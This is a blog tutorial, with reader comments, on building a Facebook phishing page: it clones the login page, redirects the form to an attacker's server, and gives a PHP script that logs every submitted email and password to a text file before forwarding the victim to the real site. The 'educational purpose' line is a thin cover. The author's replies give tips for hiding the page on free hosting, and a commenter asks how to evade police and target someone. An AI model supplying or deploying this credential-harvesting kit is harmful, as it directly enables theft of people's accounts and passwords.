Creating a Facebook phishing page with PHP

Note: This guide is only for educational purpose.

I will create and show you how to create a Facebook phishing page that will log (store) users email id and passwords, and victim wont even notice. This is just a PHP Form which stores users input into a hidden text file.

Requirements : Basic HTML knowledge, Dreamweaver.

DEMO: Click here

Step 1.

Go to Facebook.com and save the entire webpage. (File Menu > Save page as (Complete) )

Save the html page as login.php

Step 2.

Open login.php with Dreamweaver. And go to CODE view in Dreamweaver.

Find word action (CTRL + F)

<form method="POST" action="http://www.YOURHOST.com/facebook/phish.php?login_attempt=1"

Replace www.YOURHOST.com with your web servers address, you can get free web server or buy your own. Search on google: free web hosting

What we are doing is when any user enters his/her email & password in login fields we will store them into a PHP file. I’m assuming that you understand HTML-PHP Forms.

Step 3.

Create phish.php page.

header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

Step 4.

Create an empty text file password.txt

When you upload all files on your server, make sure to CHMOD 666 (File permission) to password.txt file.

Thats all!


Hope you learned something :) I will soon post a detailed PHP Contact Form tutorial.

- Ajinkya

Loading Facebook Comments ...

29 thoughts on “Creating a Facebook phishing page with PHP”

  1. i do everything same.
    but when i enter password in phishing page..

    i receive this reply

    You don’t have permission to access /login.php on this server.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request

    please tell me what is problem

    1. This was just for educational purpose.
      Anyway if u want to do so on you free hosting, host something good on you main pages. And on some internal folders upload Facebook hack -_^

  2. My old html facebook index page wont work now.
    To fix it, go to facebook.com SAVE PAGE as index.html
    Then modify the Login button ACTION as mentioend in my tutorial :)

  3. How to protect ourself from cyber police while making facebook phishing page? And how do i send it to another ID or someone using BT5 R2?

  4. I’m really enjoying the design and layout of your website.
    It’s a very easy on the eyes which makes it much more enjoyable for me to
    come here and visit more often. Did you hire out a designer to create your
    theme? Great work!

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>